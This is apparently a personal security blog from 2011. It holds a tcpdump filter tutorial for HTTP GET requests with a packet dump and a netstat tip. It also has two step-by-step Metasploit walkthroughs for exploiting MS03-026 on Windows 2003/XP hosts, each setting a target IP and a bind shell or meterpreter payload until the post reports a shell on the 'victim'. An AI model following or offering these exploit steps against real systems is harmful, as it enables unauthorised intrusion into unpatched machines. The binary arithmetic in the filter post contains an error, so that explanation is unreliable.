Tuesday, July 26, 2011

Can you find out how to make a capture filter that will only capture HTTP GET requests to a specific IP?

Answer : Capture HTTP GET requests. This looks for the bytes 'G', 'E', 'T', and ' ' (hex values 47, 45, 54, and 20) just after the TCP header. "tcp[12:1] & 0xf0) >> 2" figures out the TCP header length. From Jefferson Ogata via the tcpdump-workers mailing list.


      port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420


tcp[12:1] = In TCP header go to 12th byte and check 1 byte

0000  52 54 00 12 35 02 08 00  27 8b ba eb 08 00 45 00   RT..5... '.....E.
0010  02 9f f4 a7 40 00 40 06  00 d1 0a 00 02 0f 4a 7d   ....@.@. ......J}
0020  ec 54 87 88 00 50 5f 77  33 ac 54 e2 78 02 50 18   .T...P_w 3.T.x.P.
0030  16 d0 45 72 00 00
47 45  54 20 2f 20 48 54 54 50   ..Er..GE T / HTTP
0040  2f 31 2e 31 0d 0a 48 6f  73 74 3a 20 77 77 77 2e   /1.1..Ho st: www.
0050  67 6f 6f 67 6c 65 2e 63  6f 2e 69 6e 0d 0a 55 73   google.c o.in..Us
0060  65 72 2d 41 67 65 6e 74  3a 20 4d 6f 7a 69 6c 6c   er-Agent : Mozill
0070  61 2f 35 2e 30 20 28 58  31 31 3b 20 55 3b 20 4c   a/5.0 (X 11; U; L
0080  69 6e 75 78 20 69 36 38  36 3b 20 65 6e 2d 55 53   inux i68 6; en-US
0090  3b 20 72 76 3a 31 2e 39  2e 30 2e 31 35 29 20 47   ; rv:1.9 .0.15) G
00a0  65 63 6b 6f 2f 32 30 30  39 31 30 32 38 31 34 20   ecko/200 9102814

The bold letter is tcp header, it will automatically get highlighted when you select tcp header.

So from above, tcp[12:1] = 50

50 & 0xf0 =  1010 0000 & 1111 0000 (Masking) = 0101 0000 = 50

0101 0000
1111 0000
-----------------
0101 0000

Now using Right Shift Bit Operator by 2
0101 0000 >> 0001 0100 = 20

Now,
tcp[20:4] =  47 45  54 20 (In Hex, which G E T)

Monday, June 20, 2011

Most Commont Vulnearbility in Windows 2003(MS03-026)

The most common vulnearbility in windows 2003 is "ms03-026" service & most of the time you can exploit with the help of this vulnerability by following below steps :
1. open shell and type "msfconsole".
2. search "ms03-026".
3. copy the exact line shown up and then type use (Shift Insert);
4. show options.
5. set rhost "IP address of the target system";
6. show payloads;
7. set payload window/shell_bind_tcp;
8. exploit.

Sunday, June 12, 2011

In Windows finding out which service is running on which port

Hi,
In windows if you want to find out which service is running on which port, for example you want to know httpd server is running on which port then you can do following steps for that :

1. Open cmd as administrator (right click on cmd icon and run as administrator) otherwise you will get error "Elevation is required" while running the command.

2. type netstat -anb and press enter. Bingo you will get all the details.

Monday, May 30, 2011

hi hi hi :D ;) :)

First Hack Through Meterpreter

Dear Friends,
Today I am gonna share you my hacking through meterpreter on windows 2003/2000 winXP SP1 and SP2 (don't know about SP3).

Prerequisite : 1. BackTrack
2. MSFramework 3 (Should be updated)
3. Music for listening :)

In this tutorial i am gonna use windows 2003 server as victim and BackTrack as Attacker, at the end of tutorial we will get the shell of victim os.

1. Open the shell and type msfconsole and enter.
2. Now enter : search dcom (dcom is the exploit name and generally you get the exploit name from nessus scan or you can see all exploit by entering show exploits )
3. You will get list of result,
4. Now enter use exploit/windows/dcerpc/ms03_026_dcom
5. show options
6. set rhost 192.168.4.xxx
7. show payloads and t your fav. exploit mine fav is set payload windows/meterpreter/bind_tcp
8.exploit

Voila now you have shell of victim computer